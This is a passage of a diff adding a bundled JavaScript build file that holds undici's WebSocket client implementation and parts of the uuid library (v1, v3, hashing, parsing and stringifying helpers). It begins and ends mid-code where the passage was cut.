https://bugs.chromium.org/p/chromium/issues/detail?id=398407 + * @param {string} protocol + */ +function isValidSubprotocol (protocol) { + // If present, this value indicates one + // or more comma-separated subprotocol the client wishes to speak, + // ordered by preference. The elements that comprise this value + // MUST be non-empty strings with characters in the range U+0021 to + // U+007E not including separator characters as defined in + // [RFC2616] and MUST all be unique strings. + if (protocol.length === 0) { + return false + } + + for (const char of protocol) { + const code = char.charCodeAt(0) + + if ( + code < 0x21 || + code > 0x7E || + char === '(' || + char === ')' || + char === '<' || + char === '>' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' || + char === '=' || + char === '{' || + char === '}' || + code === 32 || // SP + code === 9 // HT + ) { + return false + } + } + + return true +} + +/** + * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 + * @param {number} code + */ +function isValidStatusCode (code) { + if (code >= 1000 && code < 1015) { + return ( + code !== 1004 && // reserved + code !== 1005 && // "MUST NOT be set as a status code" + code !== 1006 // "MUST NOT be set as a status code" + ) + } + + return code >= 3000 && code <= 4999 +} + +/** + * @param {import('./websocket').WebSocket} ws + * @param {string|undefined} reason + */ +function failWebsocketConnection (ws, reason) { + const { [kController]: controller, [kResponse]: response } = ws + + controller.abort() + + if (response?.socket && !response.socket.destroyed) { + response.socket.destroy() + } + + if (reason) { + fireEvent('error', ws, ErrorEvent, { + error: new Error(reason) + }) + } +} + +module.exports = { + isEstablished, + isClosing, + isClosed, + fireEvent, + isValidSubprotocol, + isValidStatusCode, + failWebsocketConnection, + websocketMessageReceived +} + + +/***/ }), + +/***/ 4284: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) +const { DOMException } = __nccwpck_require__(1037) +const { URLSerializer } = __nccwpck_require__(685) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) +const { + kWebSocketURL, + kReadyState, + kController, + kBinaryType, + kResponse, + kSentClose, + kByteParser +} = __nccwpck_require__(7578) +const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) +const { establishWebSocketConnection } = __nccwpck_require__(5354) +const { WebsocketFrameSend } = __nccwpck_require__(5444) +const { ByteParser } = __nccwpck_require__(1688) +const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { types } = __nccwpck_require__(3837) + +let experimentalWarned = false + +// https://websockets.spec.whatwg.org/#interface-definition +class WebSocket extends EventTarget { + #events = { + open: null, + error: null, + close: null, + message: null + } + + #bufferedAmount = 0 + #protocol = '' + #extensions = '' + + /** + * @param {string} url + * @param {string|string[]} protocols + */ + constructor (url, protocols = []) { + super() + + webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) + + if (!experimentalWarned) { + experimentalWarned = true + process.emitWarning('WebSockets are experimental, expect them to change at any time.', { + code: 'UNDICI-WS' + }) + } + + const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) + + url = webidl.converters.USVString(url) + protocols = options.protocols + + // 1. Let baseURL be this's relevant settings object's API base URL. + const baseURL = getGlobalOrigin() + + // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. + let urlRecord + + try { + urlRecord = new URL(url, baseURL) + } catch (e) { + // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. + throw new DOMException(e, 'SyntaxError') + } + + // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". + if (urlRecord.protocol === 'http:') { + urlRecord.protocol = 'ws:' + } else if (urlRecord.protocol === 'https:') { + // 5. Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". + urlRecord.protocol = 'wss:' + } + + // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. + if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { + throw new DOMException( + `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, + 'SyntaxError' + ) + } + + // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" + // DOMException. + if (urlRecord.hash || urlRecord.href.endsWith('#')) { + throw new DOMException('Got fragment', 'SyntaxError') + } + + // 8. If protocols is a string, set protocols to a sequence consisting + // of just that string. + if (typeof protocols === 'string') { + protocols = [protocols] + } + + // 9. If any of the values in protocols occur more than once or otherwise + // fail to match the requirements for elements that comprise the value + // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket + // protocol, then throw a "SyntaxError" DOMException. + if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { + throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') + } + + if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { + throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') + } + + // 10. Set this's url to urlRecord. + this[kWebSocketURL] = new URL(urlRecord.href) + + // 11. Let client be this's relevant settings object. + + // 12. Run this step in parallel: + + // 1. Establish a WebSocket connection given urlRecord, protocols, + // and client. + this[kController] = establishWebSocketConnection( + urlRecord, + protocols, + this, + (response) => this.#onConnectionEstablished(response), + options + ) + + // Each WebSocket object has an associated ready state, which is a + // number representing the state of the connection. Initially it must + // be CONNECTING (0). + this[kReadyState] = WebSocket.CONNECTING + + // The extensions attribute must initially return the empty string. + + // The protocol attribute must initially return the empty string. + + // Each WebSocket object has an associated binary type, which is a + // BinaryType. Initially it must be "blob". + this[kBinaryType] = 'blob' + } + + /** + * @see https://websockets.spec.whatwg.org/#dom-websocket-close + * @param {number|undefined} code + * @param {string|undefined} reason + */ + close (code = undefined, reason = undefined) { + webidl.brandCheck(this, WebSocket) + + if (code !== undefined) { + code = webidl.converters['unsigned short'](code, { clamp: true }) + } + + if (reason !== undefined) { + reason = webidl.converters.USVString(reason) + } + + // 1. If code is present, but is neither an integer equal to 1000 nor an + // integer in the range 3000 to 4999, inclusive, throw an + // "InvalidAccessError" DOMException. + if (code !== undefined) { + if (code !== 1000 && (code < 3000 || code > 4999)) { + throw new DOMException('invalid code', 'InvalidAccessError') + } + } + + let reasonByteLength = 0 + + // 2. If reason is present, then run these substeps: + if (reason !== undefined) { + // 1. Let reasonBytes be the result of encoding reason. + // 2. If reasonBytes is longer than 123 bytes, then throw a + // "SyntaxError" DOMException. + reasonByteLength = Buffer.byteLength(reason) + + if (reasonByteLength > 123) { + throw new DOMException( + `Reason must be less than 123 bytes; received ${reasonByteLength}`, + 'SyntaxError' + ) + } + } + + // 3. Run the first matching steps from the following list: + if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { + // If this's ready state is CLOSING (2) or CLOSED (3) + // Do nothing. + } else if (!isEstablished(this)) { + // If the WebSocket connection is not yet established + // Fail the WebSocket connection and set this's ready state + // to CLOSING (2). + failWebsocketConnection(this, 'Connection was closed before it was established.') + this[kReadyState] = WebSocket.CLOSING + } else if (!isClosing(this)) { + // If the WebSocket closing handshake has not yet been started + // Start the WebSocket closing handshake and set this's ready + // state to CLOSING (2). + // - If neither code nor reason is present, the WebSocket Close + // message must not have a body. + // - If code is present, then the status code to use in the + // WebSocket Close message must be the integer given by code. + // - If reason is also present, then reasonBytes must be + // provided in the Close message after the status code. + + const frame = new WebsocketFrameSend() + + // If neither code nor reason is present, the WebSocket Close + // message must not have a body. + + // If code is present, then the status code to use in the + // WebSocket Close message must be the integer given by code. + if (code !== undefined && reason === undefined) { + frame.frameData = Buffer.allocUnsafe(2) + frame.frameData.writeUInt16BE(code, 0) + } else if (code !== undefined && reason !== undefined) { + // If reason is also present, then reasonBytes must be + // provided in the Close message after the status code. + frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) + frame.frameData.writeUInt16BE(code, 0) + // the body MAY contain UTF-8-encoded data with value /reason/ + frame.frameData.write(reason, 2, 'utf-8') + } else { + frame.frameData = emptyBuffer + } + + /** @type {import('stream').Duplex} */ + const socket = this[kResponse].socket + + socket.write(frame.createFrame(opcodes.CLOSE), (err) => { + if (!err) { + this[kSentClose] = true + } + }) + + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + this[kReadyState] = states.CLOSING + } else { + // Otherwise + // Set this's ready state to CLOSING (2). + this[kReadyState] = WebSocket.CLOSING + } + } + + /** + * @see https://websockets.spec.whatwg.org/#dom-websocket-send + * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data + */ + send (data) { + webidl.brandCheck(this, WebSocket) + + webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) + + data = webidl.converters.WebSocketSendData(data) + + // 1. If this's ready state is CONNECTING, then throw an + // "InvalidStateError" DOMException. + if (this[kReadyState] === WebSocket.CONNECTING) { + throw new DOMException('Sent before connected.', 'InvalidStateError') + } + + // 2. Run the appropriate set of steps from the following list: + // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 + // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 + + if (!isEstablished(this) || isClosing(this)) { + return + } + + /** @type {import('stream').Duplex} */ + const socket = this[kResponse].socket + + // If data is a string + if (typeof data === 'string') { + // If the WebSocket connection is established and the WebSocket + // closing handshake has not yet started, then the user agent + // must send a WebSocket Message comprised of the data argument + // using a text frame opcode; if the data cannot be sent, e.g. + // because it would need to be buffered but the buffer is full, + // the user agent must flag the WebSocket as full and then close + // the WebSocket connection. Any invocation of this method with a + // string argument that does not throw an exception must increase + // the bufferedAmount attribute by the number of bytes needed to + // express the argument as UTF-8. + + const value = Buffer.from(data) + const frame = new WebsocketFrameSend(value) + const buffer = frame.createFrame(opcodes.TEXT) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + } else if (types.isArrayBuffer(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need + // to be buffered but the buffer is full, the user agent must flag + // the WebSocket as full and then close the WebSocket connection. + // The data to be sent is the data stored in the buffer described + // by the ArrayBuffer object. Any invocation of this method with an + // ArrayBuffer argument that does not throw an exception must + // increase the bufferedAmount attribute by the length of the + // ArrayBuffer in bytes. + + const value = Buffer.from(data) + const frame = new WebsocketFrameSend(value) + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + } else if (ArrayBuffer.isView(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need to + // be buffered but the buffer is full, the user agent must flag the + // WebSocket as full and then close the WebSocket connection. The + // data to be sent is the data stored in the section of the buffer + // described by the ArrayBuffer object that data references. Any + // invocation of this method with this kind of argument that does + // not throw an exception must increase the bufferedAmount attribute + // by the length of data’s buffer in bytes. + + const ab = Buffer.from(data, data.byteOffset, data.byteLength) + + const frame = new WebsocketFrameSend(ab) + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += ab.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= ab.byteLength + }) + } else if (isBlobLike(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need to + // be buffered but the buffer is full, the user agent must flag the + // WebSocket as full and then close the WebSocket connection. The data + // to be sent is the raw data represented by the Blob object. Any + // invocation of this method with a Blob argument that does not throw + // an exception must increase the bufferedAmount attribute by the size + // of the Blob object’s raw data, in bytes. + + const frame = new WebsocketFrameSend() + + data.arrayBuffer().then((ab) => { + const value = Buffer.from(ab) + frame.frameData = value + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + }) + } + } + + get readyState () { + webidl.brandCheck(this, WebSocket) + + // The readyState getter steps are to return this's ready state. + return this[kReadyState] + } + + get bufferedAmount () { + webidl.brandCheck(this, WebSocket) + + return this.#bufferedAmount + } + + get url () { + webidl.brandCheck(this, WebSocket) + + // The url getter steps are to return this's url, serialized. + return URLSerializer(this[kWebSocketURL]) + } + + get extensions () { + webidl.brandCheck(this, WebSocket) + + return this.#extensions + } + + get protocol () { + webidl.brandCheck(this, WebSocket) + + return this.#protocol + } + + get onopen () { + webidl.brandCheck(this, WebSocket) + + return this.#events.open + } + + set onopen (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.open) { + this.removeEventListener('open', this.#events.open) + } + + if (typeof fn === 'function') { + this.#events.open = fn + this.addEventListener('open', fn) + } else { + this.#events.open = null + } + } + + get onerror () { + webidl.brandCheck(this, WebSocket) + + return this.#events.error + } + + set onerror (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.error) { + this.removeEventListener('error', this.#events.error) + } + + if (typeof fn === 'function') { + this.#events.error = fn + this.addEventListener('error', fn) + } else { + this.#events.error = null + } + } + + get onclose () { + webidl.brandCheck(this, WebSocket) + + return this.#events.close + } + + set onclose (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.close) { + this.removeEventListener('close', this.#events.close) + } + + if (typeof fn === 'function') { + this.#events.close = fn + this.addEventListener('close', fn) + } else { + this.#events.close = null + } + } + + get onmessage () { + webidl.brandCheck(this, WebSocket) + + return this.#events.message + } + + set onmessage (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.message) { + this.removeEventListener('message', this.#events.message) + } + + if (typeof fn === 'function') { + this.#events.message = fn + this.addEventListener('message', fn) + } else { + this.#events.message = null + } + } + + get binaryType () { + webidl.brandCheck(this, WebSocket) + + return this[kBinaryType] + } + + set binaryType (type) { + webidl.brandCheck(this, WebSocket) + + if (type !== 'blob' && type !== 'arraybuffer') { + this[kBinaryType] = 'blob' + } else { + this[kBinaryType] = type + } + } + + /** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + */ + #onConnectionEstablished (response) { + // processResponse is called when the "response’s header list has been received and initialized." + // once this happens, the connection is open + this[kResponse] = response + + const parser = new ByteParser(this) + parser.on('drain', function onParserDrain () { + this.ws[kResponse].socket.resume() + }) + + response.socket.ws = this + this[kByteParser] = parser + + // 1. Change the ready state to OPEN (1). + this[kReadyState] = states.OPEN + + // 2. Change the extensions attribute’s value to the extensions in use, if + // it is not the null value. + // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 + const extensions = response.headersList.get('sec-websocket-extensions') + + if (extensions !== null) { + this.#extensions = extensions + } + + // 3. Change the protocol attribute’s value to the subprotocol in use, if + // it is not the null value. + // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 + const protocol = response.headersList.get('sec-websocket-protocol') + + if (protocol !== null) { + this.#protocol = protocol + } + + // 4. Fire an event named open at the WebSocket object. + fireEvent('open', this) + } +} + +// https://websockets.spec.whatwg.org/#dom-websocket-connecting +WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING +// https://websockets.spec.whatwg.org/#dom-websocket-open +WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN +// https://websockets.spec.whatwg.org/#dom-websocket-closing +WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING +// https://websockets.spec.whatwg.org/#dom-websocket-closed +WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED + +Object.defineProperties(WebSocket.prototype, { + CONNECTING: staticPropertyDescriptors, + OPEN: staticPropertyDescriptors, + CLOSING: staticPropertyDescriptors, + CLOSED: staticPropertyDescriptors, + url: kEnumerableProperty, + readyState: kEnumerableProperty, + bufferedAmount: kEnumerableProperty, + onopen: kEnumerableProperty, + onerror: kEnumerableProperty, + onclose: kEnumerableProperty, + close: kEnumerableProperty, + onmessage: kEnumerableProperty, + binaryType: kEnumerableProperty, + send: kEnumerableProperty, + extensions: kEnumerableProperty, + protocol: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'WebSocket', + writable: false, + enumerable: false, + configurable: true + } +}) + +Object.defineProperties(WebSocket, { + CONNECTING: staticPropertyDescriptors, + OPEN: staticPropertyDescriptors, + CLOSING: staticPropertyDescriptors, + CLOSED: staticPropertyDescriptors +}) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.DOMString +) + +webidl.converters['DOMString or sequence'] = function (V) { + if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { + return webidl.converters['sequence'](V) + } + + return webidl.converters.DOMString(V) +} + +// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 +webidl.converters.WebSocketInit = webidl.dictionaryConverter([ + { + key: 'protocols', + converter: webidl.converters['DOMString or sequence'], + get defaultValue () { + return [] + } + }, + { + key: 'dispatcher', + converter: (V) => V, + get defaultValue () { + return getGlobalDispatcher() + } + }, + { + key: 'headers', + converter: webidl.nullableConverter(webidl.converters.HeadersInit) + } +]) + +webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { + if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { + return webidl.converters.WebSocketInit(V) + } + + return { protocols: webidl.converters['DOMString or sequence'](V) } +} + +webidl.converters.WebSocketSendData = function (V) { + if (webidl.util.Type(V) === 'Object') { + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { + return webidl.converters.BufferSource(V) + } + } + + return webidl.converters.USVString(V) +} + +module.exports = { + WebSocket +} + + +/***/ }), + +/***/ 5840: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +Object.defineProperty(exports, "v1", ({ + enumerable: true, + get: function () { + return _v.default; + } +})); +Object.defineProperty(exports, "v3", ({ + enumerable: true, + get: function () { + return _v2.default; + } +})); +Object.defineProperty(exports, "v4", ({ + enumerable: true, + get: function () { + return _v3.default; + } +})); +Object.defineProperty(exports, "v5", ({ + enumerable: true, + get: function () { + return _v4.default; + } +})); +Object.defineProperty(exports, "NIL", ({ + enumerable: true, + get: function () { + return _nil.default; + } +})); +Object.defineProperty(exports, "version", ({ + enumerable: true, + get: function () { + return _version.default; + } +})); +Object.defineProperty(exports, "validate", ({ + enumerable: true, + get: function () { + return _validate.default; + } +})); +Object.defineProperty(exports, "stringify", ({ + enumerable: true, + get: function () { + return _stringify.default; + } +})); +Object.defineProperty(exports, "parse", ({ + enumerable: true, + get: function () { + return _parse.default; + } +})); + +var _v = _interopRequireDefault(__nccwpck_require__(8628)); + +var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); + +var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); + +var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); + +var _nil = _interopRequireDefault(__nccwpck_require__(5332)); + +var _version = _interopRequireDefault(__nccwpck_require__(1595)); + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +var _parse = _interopRequireDefault(__nccwpck_require__(2746)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +/***/ }), + +/***/ 4569: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function md5(bytes) { + if (Array.isArray(bytes)) { + bytes = Buffer.from(bytes); + } else if (typeof bytes === 'string') { + bytes = Buffer.from(bytes, 'utf8'); + } + + return _crypto.default.createHash('md5').update(bytes).digest(); +} + +var _default = md5; +exports["default"] = _default; + +/***/ }), + +/***/ 5332: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; +var _default = '00000000-0000-0000-0000-000000000000'; +exports["default"] = _default; + +/***/ }), + +/***/ 2746: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function parse(uuid) { + if (!(0, _validate.default)(uuid)) { + throw TypeError('Invalid UUID'); + } + + let v; + const arr = new Uint8Array(16); // Parse ########-....-....-....-............ + + arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; + arr[1] = v >>> 16 & 0xff; + arr[2] = v >>> 8 & 0xff; + arr[3] = v & 0xff; // Parse ........-####-....-....-............ + + arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; + arr[5] = v & 0xff; // Parse ........-....-####-....-............ + + arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; + arr[7] = v & 0xff; // Parse ........-....-....-####-............ + + arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; + arr[9] = v & 0xff; // Parse ........-....-....-....-############ + // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) + + arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; + arr[11] = v / 0x100000000 & 0xff; + arr[12] = v >>> 24 & 0xff; + arr[13] = v >>> 16 & 0xff; + arr[14] = v >>> 8 & 0xff; + arr[15] = v & 0xff; + return arr; +} + +var _default = parse; +exports["default"] = _default; + +/***/ }), + +/***/ 814: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; +var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; +exports["default"] = _default; + +/***/ }), + +/***/ 807: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = rng; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate + +let poolPtr = rnds8Pool.length; + +function rng() { + if (poolPtr > rnds8Pool.length - 16) { + _crypto.default.randomFillSync(rnds8Pool); + + poolPtr = 0; + } + + return rnds8Pool.slice(poolPtr, poolPtr += 16); +} + +/***/ }), + +/***/ 5274: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function sha1(bytes) { + if (Array.isArray(bytes)) { + bytes = Buffer.from(bytes); + } else if (typeof bytes === 'string') { + bytes = Buffer.from(bytes, 'utf8'); + } + + return _crypto.default.createHash('sha1').update(bytes).digest(); +} + +var _default = sha1; +exports["default"] = _default; + +/***/ }), + +/***/ 8950: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +const byteToHex = []; + +for (let i = 0; i < 256; ++i) { + byteToHex.push((i + 0x100).toString(16).substr(1)); +} + +function stringify(arr, offset = 0) { + // Note: Be careful editing this code! It's been tuned for performance + // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 + const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. If this throws, it's likely due to one + // of the following: + // - One or more input array values don't map to a hex octet (leading to + // "undefined" in the uuid) + // - Invalid input values for the RFC `version` or `variant` fields + + if (!(0, _validate.default)(uuid)) { + throw TypeError('Stringified UUID is invalid'); + } + + return uuid; +} + +var _default = stringify; +exports["default"] = _default; + +/***/ }), + +/***/ 8628: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _rng = _interopRequireDefault(__nccwpck_require__(807)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +// **`v1()` - Generate time-based UUID** +// +// Inspired by https://github.com/LiosK/UUID.js +// and http://docs.python.org/library/uuid.html +let _nodeId; + +let _clockseq; // Previous uuid creation time + + +let _lastMSecs = 0; +let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details + +function v1(options, buf, offset) { + let i = buf && offset || 0; + const b = buf || new Array(16); + options = options || {}; + let node = options.node || _nodeId; + let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not + // specified. We do this lazily to minimize issues related to insufficient + // system entropy. See #189 + + if (node == null || clockseq == null) { + const seedBytes = options.random || (options.rng || _rng.default)(); + + if (node == null) { + // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) + node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; + } + + if (clockseq == null) { + // Per 4.2.2, randomize (14 bit) clockseq + clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; + } + } // UUID timestamps are 100 nano-second units since the Gregorian epoch, + // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so + // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' + // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. + + + let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock + // cycle to simulate higher resolution clock + + let nsecs = options.nsecs !== undefined ? options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) + + const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression + + if (dt < 0 && options.clockseq === undefined) { + clockseq = clockseq + 1 & 0x3fff; + } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new + // time interval + + + if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { + nsecs = 0; + } // Per 4.2.1.2 Throw error if too many uuids are requested + + + if (nsecs >= 10000) { + throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); + } + + _lastMSecs = msecs; + _lastNSecs = nsecs; + _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch + + msecs += 12219292800000; // `time_low` + + const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; + b[i++] = tl >>> 24 & 0xff; + b[i++] = tl >>> 16 & 0xff; + b[i++] = tl >>> 8 & 0xff; + b[i++] = tl & 0xff; // `time_mid` + + const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; + b[i++] = tmh >>> 8 & 0xff; + b[i++] = tmh & 0xff; // `time_high_and_version` + + b[i++] = tmh >>> 24 & 0xf | 0x10; // include version + + b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) + + b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` + + b[i++] = clockseq & 0xff; // `node` + + for (let n = 0; n < 6; ++n) { + b[i + n] = node[n]; + } + + return buf || (0, _stringify.default)(b); +} + +var _default = v1; +exports["default"] = _default; + +/***/ }), + +/***/ 6409: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _v = _interopRequireDefault(__nccwpck_require__(5998)); + +var _md = _interopRequireDefault(__nccwpck_require__(4569)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const v3 = (0, _v.default)('v3', 0x30, _md.default); +var _default = v3; +exports["default"] = _default; + +/***/ }), + +/***/ 5998: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = _default; +exports.URL = exports.DNS = void 0; + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +var _parse = _interopRequireDefault(__nccwpck_require__(2746)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function stringToBytes(str) { + str = unescape(encodeURIComponent(str)); // UTF8 escape + + const bytes = []; + + for (let i = 0; i < str.length; ++i) { + bytes.push(str.charCodeAt(i)); + } + + return bytes; +} + +const DNS = 